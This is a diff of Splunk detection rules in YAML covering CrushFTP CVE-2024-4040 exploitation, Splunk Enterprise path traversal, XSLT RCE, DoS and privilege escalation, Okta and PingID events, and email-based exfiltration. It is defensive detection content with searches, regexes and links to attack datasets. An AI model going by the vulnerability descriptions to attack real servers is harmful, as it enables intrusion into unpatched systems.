- in_iface
|
||||
- index
|
||||
- linecount
|
||||
- proto
|
||||
- punct
|
||||
- source
|
||||
- sourcetype
|
||||
- splunk_server
|
||||
- src_ip
|
||||
- src_port
|
||||
- tcp.ack
|
||||
- tcp.fin
|
||||
- tcp.psh
|
||||
- tcp.state
|
||||
- tcp.syn
|
||||
- tcp.tcp_flags
|
||||
- tcp.tcp_flags_tc
|
||||
- tcp.tcp_flags_ts
|
||||
- timeendpos
|
||||
- timestamp
|
||||
- timestartpos
|
||||
example_log: '{"timestamp":"2023-10-17T01:24:52.149017+0000","flow_id":721124494649885,"in_iface":"ens5","event_type":"flow","src_ip":"192.0.2.1","src_port":30880,"dest_ip":"192.0.2.2","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":640,"bytes_toclient":660,"start":"2023-10-17T01:20:23.829981+0000","end":"2023-10-17T01:22:11.831172+0000","age":108,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}}'
|
||||
|
||||
@@ -0,0 +1,63 @@
|
||||
name: CrushFTP Server Side Template Injection
|
||||
id: ccf6b7a3-bd39-4bc9-a949-143a8d640dbc
|
||||
version: 1
|
||||
date: '2024-05-16'
|
||||
author: Michael Haag, Splunk
|
||||
data_source: []
|
||||
type: TTP
|
||||
status: production
|
||||
description: This analytic is designed to identify attempts to exploit a server-side template injection vulnerability in CrushFTP, designated as CVE-2024-4040. This severe vulnerability enables unauthenticated remote attackers to access and read files beyond the VFS Sandbox, circumvent authentication protocols, and execute arbitrary commands on the affected server. The issue impacts all versions of CrushFTP up to 10.7.1 and 11.1.0 on all supported platforms. It is highly recommended to apply patches immediately to prevent unauthorized access to the system and avoid potential data compromises. The search specifically looks for patterns in the raw log data that match the exploitation attempts, including READ or WRITE actions, and extracts relevant information such as the protocol, session ID, user, IP address, HTTP method, and the URI queried. It then evaluates these logs to confirm traces of exploitation based on the presence of specific keywords and the originating IP address, counting and sorting these events for further analysis.
|
||||
search: '`crushftp`
|
||||
| rex field=_raw "\[(?<protocol>HTTPS|HTTP):(?<session_id>[^\:]+):(?<user>[^\:]+):(?<src_ip>\d+\.\d+\.\d+\.\d+)\] (?<action>READ|WROTE): \*(?<http_method>[A-Z]+) (?<uri_query>[^\s]+) HTTP/[^\*]+\*"
|
||||
| eval message=if(match(_raw, "INCLUDE") and isnotnull(src_ip), "traces of exploitation by " . src_ip, "false")
|
||||
| search message!=false
|
||||
| rename host as dest
|
||||
| stats count by _time, dest, source, message, src_ip, http_method, uri_query, user, action
|
||||
| sort -_time| `crushftp_server_side_template_injection_filter`'
|
||||
how_to_implement: CrushFTP Session logs, from Windows or Linux, must be ingested to Splunk. Currently, there is no TA for CrushFTP, so the data must be extracted from the raw logs.
|
||||
known_false_positives: False positives should be limited, however tune or filter as needed.
|
||||
references:
|
||||
- https://github.com/airbus-cert/CVE-2024-4040
|
||||
- https://www.bleepingcomputer.com/news/security/crushftp-warns-users-to-patch-exploited-zero-day-immediately/
|
||||
tags:
|
||||
analytic_story:
|
||||
- CrushFTP Vulnerabilities
|
||||
asset_type: Web Application
|
||||
confidence: 80
|
||||
impact: 80
|
||||
message: Potential exploitation of CrushFTP Server Side Template Injection Vulnerability on $dest$ by $src_ip$.
|
||||
mitre_attack_id:
|
||||
- T1192
|
||||
observable:
|
||||
- name: dest
|
||||
type: IP Address
|
||||
role:
|
||||
- Victim
|
||||
- name: src_ip
|
||||
type: IP Address
|
||||
role:
|
||||
- Attacker
|
||||
product:
|
||||
- Splunk Enterprise
|
||||
- Splunk Enterprise Security
|
||||
- Splunk Cloud
|
||||
required_fields:
|
||||
- _time
|
||||
- dest
|
||||
- source
|
||||
- src_ip
|
||||
- http_method
|
||||
- uri_query
|
||||
- user
|
||||
- action
|
||||
- message
|
||||
risk_score: 64
|
||||
security_domain: network
|
||||
cve:
|
||||
- CVE-2024-4040
|
||||
tests:
|
||||
- name: True Positive Test
|
||||
attack_data:
|
||||
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1190/crushftp/crushftp.log
|
||||
sourcetype: crushftp:sessionlogs
|
||||
source: crushftp
|
||||
@@ -1,13 +1,17 @@
|
||||
name: Detect New Login Attempts to Routers
|
||||
id: bce3ed7c-9b1f-42a0-abdf-d8b123a34836
|
||||
version: 1
|
||||
date: '2017-09-12'
|
||||
version: 2
|
||||
date: '2024-05-14'
|
||||
author: Bhavin Patel, Splunk
|
||||
status: experimental
|
||||
type: TTP
|
||||
description: The search queries the authentication logs for assets that are categorized
|
||||
as routers in the ES Assets and Identity Framework, to identify connections that
|
||||
have not been seen before in the last 30 days.
|
||||
description: The following analytic identifies new login attempts to routers. It leverages
|
||||
authentication logs from the ES Assets and Identity Framework, focusing on assets
|
||||
categorized as routers. The detection flags connections that have not been observed
|
||||
in the past 30 days. This activity is significant because unauthorized access to
|
||||
routers can lead to network disruptions or data interception. If confirmed malicious,
|
||||
attackers could gain control over network traffic, potentially leading to data breaches
|
||||
or further network compromise.
|
||||
data_source: []
|
||||
search: '| tstats `security_content_summariesonly` count earliest(_time) as earliest
|
||||
latest(_time) as latest from datamodel=Authentication where Authentication.dest_category=router
|
||||
|
||||
@@ -1,13 +1,18 @@
|
||||
name: Email Attachments With Lots Of Spaces
|
||||
id: 56e877a6-1455-4479-ada6-0550dc1e22f8
|
||||
version: 2
|
||||
date: '2023-04-14'
|
||||
version: 3
|
||||
date: '2024-05-16'
|
||||
author: David Dorsey, Splunk
|
||||
status: experimental
|
||||
type: Anomaly
|
||||
description: Attackers often use spaces as a means to obfuscate an attachment's file
|
||||
extension. This search looks for messages with email attachments that have many
|
||||
spaces within the file names.
|
||||
description: The following analytic detects email attachments with an unusually high
|
||||
number of spaces in their file names, which is a common tactic used by attackers
|
||||
to obfuscate file extensions. It leverages the Email data model to identify attachments
|
||||
where the ratio of spaces to the total file name length exceeds 10%. This behavior
|
||||
is significant as it may indicate an attempt to bypass security filters and deliver
|
||||
malicious payloads. If confirmed malicious, this activity could lead to the execution
|
||||
of harmful code or unauthorized access to sensitive information within the recipient's
|
||||
environment.
|
||||
data_source: []
|
||||
search: '| tstats `security_content_summariesonly` count values(All_Email.recipient)
|
||||
as recipient_address min(_time) as firstTime max(_time) as lastTime from datamodel=Email
|
||||
@@ -16,12 +21,12 @@ search: '| tstats `security_content_summariesonly` count values(All_Email.recipi
|
||||
| eval space_ratio = (mvcount(split(file_name," "))-1)/len(file_name) | search space_ratio
|
||||
>= 0.1 | rex field=recipient_address "(?<recipient_user>.*)@" | `email_attachments_with_lots_of_spaces_filter`'
|
||||
how_to_implement: 'You need to ingest data from emails. Specifically, the sender''s
|
||||
address and the file names of any attachments must be mapped to the Email data
|
||||
model. The threshold ratio is set to 10%, but this value can be configured to
|
||||
suit each environment.
|
||||
|
||||
address and the file names of any attachments must be mapped to the Email data model.
|
||||
The threshold ratio is set to 10%, but this value can be configured to suit each
|
||||
environment.
|
||||
|
||||
**Splunk Phantom Playbook Integration**
|
||||
|
||||
|
||||
If Splunk Phantom is also configured in your environment, a playbook called "Suspicious
|
||||
Email Attachment Investigate and Delete" can be configured to run when any results
|
||||
are found by this detection search. To use this integration, install the Phantom
|
||||
|
||||
@@ -1,12 +1,18 @@
|
||||
name: Email files written outside of the Outlook directory
|
||||
id: 8d52cf03-ba25-4101-aa78-07994aed4f74
|
||||
version: 3
|
||||
date: '2020-07-21'
|
||||
version: 4
|
||||
date: '2024-05-15'
|
||||
author: Bhavin Patel, Splunk
|
||||
status: experimental
|
||||
type: TTP
|
||||
description: The search looks at the change-analysis data model and detects email
|
||||
files created outside the normal Outlook directory.
|
||||
description: The following analytic detects email files (.pst or .ost) being created
|
||||
outside the standard Outlook directories. It leverages the Endpoint.Filesystem data
|
||||
model to identify file creation events and filters for email files not located in
|
||||
"C:\Users\*\My Documents\Outlook Files\*" or "C:\Users\*\AppData\Local\Microsoft\Outlook*".
|
||||
This activity is significant as it may indicate data exfiltration or unauthorized
|
||||
access to email data. If confirmed malicious, an attacker could potentially access
|
||||
sensitive email content, leading to data breaches or further exploitation within
|
||||
the network.
|
||||
data_source:
|
||||
- Sysmon Event ID 11
|
||||
search: '| tstats `security_content_summariesonly` count values(Filesystem.file_path)
|
||||
|
||||
@@ -1,13 +1,17 @@
|
||||
name: Email servers sending high volume traffic to hosts
|
||||
id: 7f5fb3e1-4209-4914-90db-0ec21b556378
|
||||
version: 2
|
||||
date: '2020-07-21'
|
||||
version: 3
|
||||
date: '2024-05-18'
|
||||
author: Bhavin Patel, Splunk
|
||||
status: experimental
|
||||
type: Anomaly
|
||||
description: This search looks for an increase of data transfers from your email server
|
||||
to your clients. This could be indicative of a malicious actor collecting data using
|
||||
your email server.
|
||||
description: The following analytic identifies a significant increase in data transfers
|
||||
from your email server to client hosts. It leverages the Network_Traffic data model
|
||||
to monitor outbound traffic from email servers, using statistical analysis to detect
|
||||
anomalies based on average and standard deviation metrics. This activity is significant
|
||||
as it may indicate a malicious actor exfiltrating data via your email server. If
|
||||
confirmed malicious, this could lead to unauthorized data access and potential data
|
||||
breaches, compromising sensitive information and impacting organizational security.
|
||||
data_source: []
|
||||
search: '| tstats `security_content_summariesonly` sum(All_Traffic.bytes_out) as bytes_out
|
||||
from datamodel=Network_Traffic where All_Traffic.src_category=email_server by All_Traffic.dest_ip
|
||||
|
||||
@@ -1,12 +1,17 @@
|
||||
name: Monitor Email For Brand Abuse
|
||||
id: b2ea1f38-3a3e-4b8a-9cf1-82760d86a6b8
|
||||
version: 2
|
||||
date: '2018-01-05'
|
||||
version: 3
|
||||
date: '2024-04-16'
|
||||
author: David Dorsey, Splunk
|
||||
status: experimental
|
||||
type: TTP
|
||||
description: This search looks for emails claiming to be sent from a domain similar
|
||||
to one that you want to have monitored for abuse.
|
||||
description: The following analytic identifies emails claiming to be sent from a domain
|
||||
similar to one you are monitoring for potential abuse. It leverages email header
|
||||
data, specifically the sender's address, and cross-references it with a lookup table
|
||||
of known domain permutations generated by the "ESCU - DNSTwist Domain Names" search.
|
||||
This activity is significant as it can indicate phishing attempts or brand impersonation,
|
||||
which are common tactics used in social engineering attacks. If confirmed malicious,
|
||||
this could lead to unauthorized access, data theft, or reputational damage.
|
||||
data_source: []
|
||||
search: '| tstats `security_content_summariesonly` values(All_Email.recipient) as
|
||||
recipients, min(_time) as firstTime, max(_time) as lastTime from datamodel=Email
|
||||
|
||||
@@ -1,20 +1,30 @@
|
||||
name: Okta Suspicious Activity Reported
|
||||
id: bfc840f5-c9c6-454c-aa13-b46fd0bf1e79
|
||||
version: 2
|
||||
date: '2022-09-21'
|
||||
version: 3
|
||||
date: '2024-05-13'
|
||||
author: Michael Haag, Splunk
|
||||
status: production
|
||||
type: TTP
|
||||
description: This event is generated when an associate receives an email from Okta inquiring whether a login attempt was suspicious. If the associate deems it suspicious, an event is generated for review.
|
||||
description: The following analytic identifies when an associate reports a login attempt
|
||||
as suspicious via an email from Okta. It leverages Okta Identity Management logs,
|
||||
specifically the `user.account.report_suspicious_activity_by_enduser` event type.
|
||||
This activity is significant as it indicates potential unauthorized access attempts,
|
||||
warranting immediate investigation to prevent possible security breaches. If confirmed
|
||||
malicious, the attacker could gain unauthorized access to sensitive systems and
|
||||
data, leading to data theft, privilege escalation, or further compromise of the
|
||||
environment.
|
||||
data_source: []
|
||||
search: '`okta` eventType=user.account.report_suspicious_activity_by_enduser
|
||||
| stats count min(_time) as firstTime max(_time) as lastTime values(displayMessage) by user eventType client.userAgent.rawUserAgent client.userAgent.browser client.geographicalContext.city client.geographicalContext.country
|
||||
| `security_content_ctime(firstTime)`
|
||||
| `security_content_ctime(lastTime)`
|
||||
| `okta_suspicious_activity_reported_filter`'
|
||||
how_to_implement: This detection utilizes logs from Okta Identity Management (IM) environments. It requires the ingestion of OktaIm2 logs through the Splunk Add-on for Okta Identity Cloud (https://splunkbase.splunk.com/app/6553). Additionally, it necessitates the activation of suspicious activity reporting and training for associates to report such activities.
|
||||
known_false_positives: False positives should be minimal, given the high fidelity of this detection.
|
||||
marker.
|
||||
search: '`okta` eventType=user.account.report_suspicious_activity_by_enduser | stats
|
||||
count min(_time) as firstTime max(_time) as lastTime values(displayMessage) by user
|
||||
eventType client.userAgent.rawUserAgent client.userAgent.browser client.geographicalContext.city client.geographicalContext.country
|
||||
| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `okta_suspicious_activity_reported_filter`'
|
||||
how_to_implement: This detection utilizes logs from Okta Identity Management (IM)
|
||||
environments. It requires the ingestion of OktaIm2 logs through the Splunk Add-on
|
||||
for Okta Identity Cloud (https://splunkbase.splunk.com/app/6553). Additionally,
|
||||
it necessitates the activation of suspicious activity reporting and training for
|
||||
associates to report such activities.
|
||||
known_false_positives: False positives should be minimal, given the high fidelity
|
||||
of this detection. marker.
|
||||
references:
|
||||
- https://help.okta.com/en-us/Content/Topics/Security/suspicious-activity-reporting.htm
|
||||
tags:
|
||||
@@ -23,7 +33,8 @@ tags:
|
||||
asset_type: Okta Tenant
|
||||
confidence: 50
|
||||
impact: 50
|
||||
message: A user [$user$] reported suspicious activity in Okta. Investigate further to determine if this was authorized.
|
||||
message: A user [$user$] reported suspicious activity in Okta. Investigate further
|
||||
to determine if this was authorized.
|
||||
mitre_attack_id:
|
||||
- T1078
|
||||
- T1078.001
|
||||
@@ -50,6 +61,7 @@ tags:
|
||||
tests:
|
||||
- name: True Positive Test
|
||||
attack_data:
|
||||
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1078/okta_suspicious_activity_reported_by_user/okta_suspicious_activity_reported_by_user.log
|
||||
- data:
|
||||
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1078/okta_suspicious_activity_reported_by_user/okta_suspicious_activity_reported_by_user.log
|
||||
source: Okta
|
||||
sourcetype: OktaIM2:log
|
||||
sourcetype: OktaIM2:log
|
||||
|
||||
@@ -1,25 +1,35 @@
|
||||
name: PingID New MFA Method Registered For User
|
||||
id: 892dfeaf-461d-4a78-aac8-b07e185c9bce
|
||||
version: 1
|
||||
date: '2023-09-26'
|
||||
version: 2
|
||||
date: '2024-05-07'
|
||||
author: Steven Dick
|
||||
status: production
|
||||
type: TTP
|
||||
description: The following analytic identifies the registration of a new Multi Factor authentication method for a PingID (PingOne) account. Adversaries who have obtained unauthorized access to a user account may register a new MFA method to maintain persistence.
|
||||
description: The following analytic detects the registration of a new Multi-Factor
|
||||
Authentication (MFA) method for a PingID (PingOne) account. It leverages JSON logs
|
||||
from PingID, specifically looking for successful device pairing events. This activity
|
||||
is significant as adversaries who gain unauthorized access to a user account may
|
||||
register a new MFA method to maintain persistence. If confirmed malicious, this
|
||||
could allow attackers to bypass existing security measures, maintain long-term access,
|
||||
and potentially escalate their privileges within the compromised environment.
|
||||
data_source:
|
||||
- PingID
|
||||
search: >-
|
||||
`pingid` "result.message"="Device Paired*" result.status="SUCCESS"
|
||||
| rex field=result.message "Device (Unp)?(P)?aired (?<device_extract>.+)"
|
||||
| eval src = coalesce('resources{}.ipaddress','resources{}.devicemodel'), user = upper('actors{}.name'), reason = 'result.message'
|
||||
`pingid` "result.message"="Device Paired*" result.status="SUCCESS" | rex field=result.message
|
||||
"Device (Unp)?(P)?aired (?<device_extract>.+)"
|
||||
| eval src = coalesce('resources{}.ipaddress','resources{}.devicemodel'), user =
|
||||
upper('actors{}.name'), reason = 'result.message'
|
||||
| eval object=CASE(ISNOTNULL('resources{}.devicemodel'),'resources{}.devicemodel',true(),device_extract)
|
||||
| eval action=CASE(match('result.message',"Device Paired*"),"created",match('result.message', "Device Unpaired*"),"deleted")
|
||||
| eval action=CASE(match('result.message',"Device Paired*"),"created",match('result.message',
|
||||
"Device Unpaired*"),"deleted")
|
||||
| stats count min(_time) as firstTime, max(_time) as lastTime by src,user,object,action,reason
|
||||
| `security_content_ctime(firstTime)`
|
||||
| `security_content_ctime(lastTime)`
|
||||
| `pingid_new_mfa_method_registered_for_user_filter`
|
||||
how_to_implement: Target environment must ingest JSON logging from a PingID(PingOne) enterprise environment, either via Webhook or Push Subscription.
|
||||
known_false_positives: False positives may be generated by normal provisioning workflows for user device registration.
|
||||
how_to_implement: Target environment must ingest JSON logging from a PingID(PingOne)
|
||||
enterprise environment, either via Webhook or Push Subscription.
|
||||
known_false_positives: False positives may be generated by normal provisioning workflows
|
||||
for user device registration.
|
||||
references:
|
||||
- https://twitter.com/jhencinski/status/1618660062352007174
|
||||
- https://attack.mitre.org/techniques/T1098/005/
|
||||
@@ -31,11 +41,12 @@ tags:
|
||||
asset_type: Identity
|
||||
confidence: 50
|
||||
impact: 20
|
||||
message: An MFA configuration change was detected for [$user$], the device [$object$] was $action$.
|
||||
message: An MFA configuration change was detected for [$user$], the device [$object$]
|
||||
was $action$.
|
||||
mitre_attack_id:
|
||||
- T1621
|
||||
- T1556.006
|
||||
- T1098.005
|
||||
- T1098.005
|
||||
observable:
|
||||
- name: user
|
||||
type: User
|
||||
@@ -65,7 +76,8 @@ tags:
|
||||
tests:
|
||||
- name: True Positive Test
|
||||
attack_data:
|
||||
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1621/pingid/pingid.log
|
||||
- data:
|
||||
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1621/pingid/pingid.log
|
||||
source: PINGID
|
||||
sourcetype: _json
|
||||
update_timestamp: true
|
||||
update_timestamp: true
|
||||
|
||||
@@ -1,16 +1,23 @@
|
||||
name: Splunk Absolute Path Traversal Using runshellscript
|
||||
id: 356bd3fe-f59b-4f64-baa1-51495411b7ad
|
||||
version: 1
|
||||
date: '2023-09-05'
|
||||
version: 2
|
||||
date: '2024-05-17'
|
||||
author: Rod Soto
|
||||
status: production
|
||||
type: Hunting
|
||||
data_source:
|
||||
data_source:
|
||||
- Splunk
|
||||
description: In Splunk Enterprise versions lower than 8.2.12, 9.0.6, and 9.1.1, an attacker can exploit an absolute path traversal to execute arbitrary code that is located on a separate disk.
|
||||
search: >-
|
||||
`splunk_python` *runshellscript*
|
||||
| eval log_split=split(_raw, "runshellscript: ")
|
||||
description: The following analytic detects the exploitation of an absolute path traversal
|
||||
vulnerability in Splunk Enterprise versions lower than 8.2.12, 9.0.6, and 9.1.1,
|
||||
where an attacker can execute arbitrary code located on a separate disk. It leverages
|
||||
logs from the `splunk_python` macro, specifically looking for the `runshellscript`
|
||||
command with a specific argument count and path pattern. This activity is significant
|
||||
as it indicates a potential exploitation attempt that could lead to unauthorized
|
||||
code execution. If confirmed malicious, this could allow an attacker to gain control
|
||||
over the Splunk instance, leading to data breaches or further system compromise.
|
||||
search: >-
|
||||
`splunk_python` *runshellscript* | eval log_split=split(_raw, "runshellscript:
|
||||
")
|
||||
| eval array_raw = mvindex(log_split,1)
|
||||
| eval data_cleaned=replace(replace(replace(array_raw,"\[",""),"\]",""),"'","")
|
||||
| eval array_indices=split(data_cleaned,",")
|
||||
@@ -19,20 +26,25 @@ search: >-
|
||||
| eval interpreter=mvindex(array_indices,0)
|
||||
| eval targetScript=mvindex(array_indices,1)
|
||||
| eval targetScript != "*C:*"
|
||||
| stats count min(_time) as firstTime max(_time) as lastTime by splunk_server interpreter targetScript
|
||||
| stats count min(_time) as firstTime max(_time) as lastTime by splunk_server interpreter
|
||||
targetScript
|
||||
| `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)`
|
||||
| `splunk_absolute_path_traversal_using_runshellscript_filter`
|
||||
how_to_implement: Must have access to internal indexes. Only applies to Splunk on Windows versions.
|
||||
known_false_positives: The command runshellscript can be used for benign purposes. Analyst will have to review the searches and determined maliciousness specially by looking at targeted script.
|
||||
how_to_implement: Must have access to internal indexes. Only applies to Splunk on
|
||||
Windows versions.
|
||||
known_false_positives: The command runshellscript can be used for benign purposes.
|
||||
Analyst will have to review the searches and determined maliciousness specially
|
||||
by looking at targeted script.
|
||||
references:
|
||||
- https://advisory.splunk.com/advisories/SVD-2023-0806
|
||||
tags:
|
||||
analytic_story:
|
||||
- Splunk Vulnerabilities
|
||||
- Splunk Vulnerabilities
|
||||
asset_type: Endpoint
|
||||
confidence: 70
|
||||
impact: 50
|
||||
message: Possible attack against splunk_server $splunk_server$ through abuse of the runshellscript command
|
||||
message: Possible attack against splunk_server $splunk_server$ through abuse of
|
||||
the runshellscript command
|
||||
mitre_attack_id:
|
||||
- T1083
|
||||
cve:
|
||||
@@ -53,7 +65,8 @@ tags:
|
||||
tests:
|
||||
- name: True Positive Test
|
||||
attack_data:
|
||||
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1083/splunk/splunk_absolute_path_traversal_using_runshellscript_splunk_python.log
|
||||
source: python.log
|
||||
- data:
|
||||
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1083/splunk/splunk_absolute_path_traversal_using_runshellscript_splunk_python.log
|
||||
source: python.log
|
||||
sourcetype: splunk_python
|
||||
custom_index: _internal
|
||||
custom_index: _internal
|
||||
|
||||
@@ -1,54 +1,62 @@
|
||||
name: Splunk App for Lookup File Editing RCE via User XSLT
|
||||
id: a053e6a6-2146-483a-9798-2d43652f3299
|
||||
version: 1
|
||||
date: '2023-11-16'
|
||||
version: 2
|
||||
date: '2024-05-16'
|
||||
author: Rod Soto, Splunk
|
||||
status: experimental
|
||||
type: Hunting
|
||||
data_source: []
|
||||
description: This search provides information to investigate possible remote code execution exploitation via
|
||||
user-supplied Extensible Stylesheet Language Transformations (XSLT), affecting Splunk versions 9.1.x.
|
||||
search: '| rest splunk_server=local /services/data/lookup-table-files/
|
||||
| fields title author disabled eai:acl.app eai:acl.owner eai:acl.sharing eai:appName eai:data
|
||||
| `splunk_app_for_lookup_file_editing_rce_via_user_xslt_filter`'
|
||||
how_to_implement: Because there is no way to detect the payload, this search only provides the ability to monitor
|
||||
the creation of lookups which are the base of this exploit. An operator must then investigate suspicious lookups.
|
||||
This search requires ability to perform REST queries. Note that if the Splunk App for Lookup File Editing is not,
|
||||
or was not, installed in the Splunk environment then it is not necessary to run the search as the enviornment
|
||||
was not vulnerable.
|
||||
known_false_positives: This search will provide information for investigation and hunting of lookup creation via
|
||||
user-supplied XSLT which may be indications of possible exploitation. There will be false positives as it is
|
||||
not possible to detect the payload executed via this exploit.
|
||||
description: The following analytic identifies the creation of lookup files in Splunk,
|
||||
which could indicate an attempt to exploit remote code execution via user-supplied
|
||||
XSLT. It leverages REST API queries to monitor the creation of these lookups, focusing
|
||||
on fields such as title, author, and access control lists. This activity is significant
|
||||
because it targets a known vulnerability in Splunk versions 9.1.x, potentially allowing
|
||||
attackers to execute arbitrary code. If confirmed malicious, this could lead to
|
||||
unauthorized code execution, compromising the integrity and security of the Splunk
|
||||
environment.
|
||||
search: '| rest splunk_server=local /services/data/lookup-table-files/ | fields title
|
||||
author disabled eai:acl.app eai:acl.owner eai:acl.sharing eai:appName eai:data |
|
||||
`splunk_app_for_lookup_file_editing_rce_via_user_xslt_filter`'
|
||||
how_to_implement: Because there is no way to detect the payload, this search only
|
||||
provides the ability to monitor the creation of lookups which are the base of this
|
||||
exploit. An operator must then investigate suspicious lookups. This search requires
|
||||
ability to perform REST queries. Note that if the Splunk App for Lookup File Editing
|
||||
is not, or was not, installed in the Splunk environment then it is not necessary
|
||||
to run the search as the enviornment was not vulnerable.
|
||||
known_false_positives: This search will provide information for investigation and
|
||||
hunting of lookup creation via user-supplied XSLT which may be indications of possible
|
||||
exploitation. There will be false positives as it is not possible to detect the
|
||||
payload executed via this exploit.
|
||||
references:
|
||||
- https://advisory.splunk.com/advisories/SVD-2023-1104
|
||||
cve:
|
||||
- CVE-2023-46214
|
||||
- https://advisory.splunk.com/advisories/SVD-2023-1104
|
||||
cve:
|
||||
- CVE-2023-46214
|
||||
tags:
|
||||
analytic_story:
|
||||
- Splunk Vulnerabilities
|
||||
- Splunk Vulnerabilities
|
||||
asset_type: Endpoint
|
||||
confidence: 2
|
||||
impact: 50
|
||||
message: Please review $eai:acl.app$ for possible malicious lookups
|
||||
mitre_attack_id:
|
||||
- T1210
|
||||
- T1210
|
||||
observable:
|
||||
- name: eai:acl.app
|
||||
type: Other
|
||||
role:
|
||||
- Victim
|
||||
- name: eai:acl.app
|
||||
type: Other
|
||||
role:
|
||||
- Victim
|
||||
product:
|
||||
- Splunk Enterprise
|
||||
- Splunk Enterprise Security
|
||||
- Splunk Cloud
|
||||
- Splunk Enterprise
|
||||
- Splunk Enterprise Security
|
||||
- Splunk Cloud
|
||||
risk_score: 1
|
||||
required_fields:
|
||||
- title
|
||||
- author
|
||||
- disabled
|
||||
- ea:acl.app
|
||||
- eai:acl.owner
|
||||
- eai:acl.sharing
|
||||
- eai:appName
|
||||
- eai:data
|
||||
- title
|
||||
- author
|
||||
- disabled
|
||||
- ea:acl.app
|
||||
- eai:acl.owner
|
||||
- eai:acl.sharing
|
||||
- eai:appName
|
||||
- eai:data
|
||||
security_domain: endpoint
|
||||
|
||||
@@ -1,16 +1,25 @@
|
||||
name: Splunk DOS Via Dump SPL Command
|
||||
id: fb0e6823-365f-48ed-b09e-272ac4c1dad6
|
||||
version: 1
|
||||
date: '2023-05-10'
|
||||
version: 2
|
||||
date: '2024-05-03'
|
||||
author: Rod Soto
|
||||
status: production
|
||||
type: Hunting
|
||||
data_source:
|
||||
- Splunk
|
||||
description: In Splunk Enterprise versions below 9.0.5, 8.2.11, and 8.1.14, an attacker can exploit a vulnerability in the dump SPL command to cause a Denial of Service by crashing the Splunk daemon.
|
||||
description: The following analytic identifies a potential Denial of Service (DoS)
|
||||
attack exploiting the dump SPL command in vulnerable Splunk Enterprise versions.
|
||||
It detects this activity by searching the `splunk_crash_log` for segmentation fault
|
||||
entries, indicating a crash of the Splunk daemon. This activity is significant for
|
||||
a SOC because it can disrupt the availability of Splunk services, impacting monitoring
|
||||
and incident response capabilities. If confirmed malicious, this attack could render
|
||||
Splunk Enterprise unusable, severely hindering an organization's ability to detect
|
||||
and respond to other security threats.
|
||||
search: '`splunk_crash_log` "*Segmentation fault*" | stats count by host _time | `splunk_dos_via_dump_spl_command_filter`'
|
||||
how_to_implement: This search does not require additional ingestion of data. Requires the ability to search _internal index and monitor segmentation faults.
|
||||
known_false_positives: Segmentation faults may occur due to other causes, so this search may produce false positives
|
||||
how_to_implement: This search does not require additional ingestion of data. Requires
|
||||
the ability to search _internal index and monitor segmentation faults.
|
||||
known_false_positives: Segmentation faults may occur due to other causes, so this
|
||||
search may produce false positives
|
||||
references:
|
||||
- https://advisory.splunk.com/
|
||||
tags:
|
||||
@@ -32,8 +41,8 @@ tags:
|
||||
- Splunk Enterprise
|
||||
risk_score: 100
|
||||
required_fields:
|
||||
- host
|
||||
- source
|
||||
- host
|
||||
- source
|
||||
- event_message
|
||||
- status
|
||||
- _time
|
||||
@@ -41,7 +50,8 @@ tags:
|
||||
tests:
|
||||
- name: True Positive Test
|
||||
attack_data:
|
||||
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1499.004/splunk/splunk_dos_via_dump_spl_command.log
|
||||
- data:
|
||||
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1499.004/splunk/splunk_dos_via_dump_spl_command.log
|
||||
source: /opt/splunk/var/log/splunk/splunkd.log
|
||||
sourcetype: splunkd_crash_log
|
||||
custom_index: _internal
|
||||
custom_index: _internal
|
||||
|
||||
@@ -1,28 +1,42 @@
|
||||
name: Splunk Edit User Privilege Escalation
|
||||
id: 39e1c326-67d7-4c0d-8584-8056354f6593
|
||||
version: 1
|
||||
date: '2023-05-23'
|
||||
version: 2
|
||||
date: '2024-05-15'
|
||||
author: Rod Soto, Chase Franklin
|
||||
status: production
|
||||
type: Hunting
|
||||
data_source:
|
||||
- Splunk
|
||||
description: A low-privilege user who holds a role that has the edit_user capability assigned to it can escalate their privileges to that of the admin user by providing specially crafted web requests.
|
||||
search: '`audittrail` action IN ("change_own_password","password_change","edit_password") AND info="granted" AND NOT user IN (admin, splunk-system-user) | stats earliest(_time) as event_time values(index) as index values(sourcetype) as sourcetype values(action) as action values(info) as info by user | `splunk_edit_user_privilege_escalation_filter`'
|
||||
how_to_implement: This detection does not require you to ingest any new data. The detection does require the ability to search the _audit index. This detection may assist in efforts to discover abuse of edit_user privilege.
|
||||
known_false_positives: This search may produce false positives as password changing actions may be part of normal behavior. Operator will need to investigate these actions in order to discern exploitation attempts.
|
||||
description: The following analytic identifies attempts by low-privilege users to
|
||||
escalate their privileges to admin by exploiting the edit_user capability. It detects
|
||||
this activity by analyzing audit trail logs for specific actions such as "change_own_password"
|
||||
and "edit_password" where the info field is "granted" and the user is not an admin
|
||||
or system user. This activity is significant because it indicates potential privilege
|
||||
escalation, which is a critical security concern. If confirmed malicious, this could
|
||||
allow an attacker to gain administrative access, leading to full control over the
|
||||
Splunk environment and potential data breaches.
|
||||
search: '`audittrail` action IN ("change_own_password","password_change","edit_password")
|
||||
AND info="granted" AND NOT user IN (admin, splunk-system-user) | stats earliest(_time)
|
||||
as event_time values(index) as index values(sourcetype) as sourcetype values(action)
|
||||
as action values(info) as info by user | `splunk_edit_user_privilege_escalation_filter`'
|
||||
how_to_implement: This detection does not require you to ingest any new data. The
|
||||
detection does require the ability to search the _audit index. This detection may
|
||||
assist in efforts to discover abuse of edit_user privilege.
|
||||
known_false_positives: This search may produce false positives as password changing
|
||||
actions may be part of normal behavior. Operator will need to investigate these
|
||||
actions in order to discern exploitation attempts.
|
||||
references:
|
||||
- https://advisory.splunk.com/
|
||||
